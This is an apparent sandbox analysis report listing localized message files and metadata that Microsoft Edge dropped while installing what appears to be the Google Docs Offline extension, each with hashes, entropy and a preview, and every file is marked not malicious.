                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):980
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                          MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                          SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                          SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                          SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1941
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                                          MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                                          SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                                          SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                                          SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1969
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                          MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                          SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                          SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                          SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1674
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                          MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                          SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                          SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                          SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1063
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                          MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                          SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                          SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                          SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1333
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                          MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                          SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                          SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                          SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1263
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                          MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                          SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                          SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                          SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1074
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                          MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                          SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                          SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                          SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):879
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                          MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                          SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                          SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                          SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1205
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                          MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                          SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                          SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                          SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):843
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                          MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                          SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                          SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                          SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):912
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                          MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                          SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                          SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                          SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):11406
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                                          MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                                          SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                                          SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                                          SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):854
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
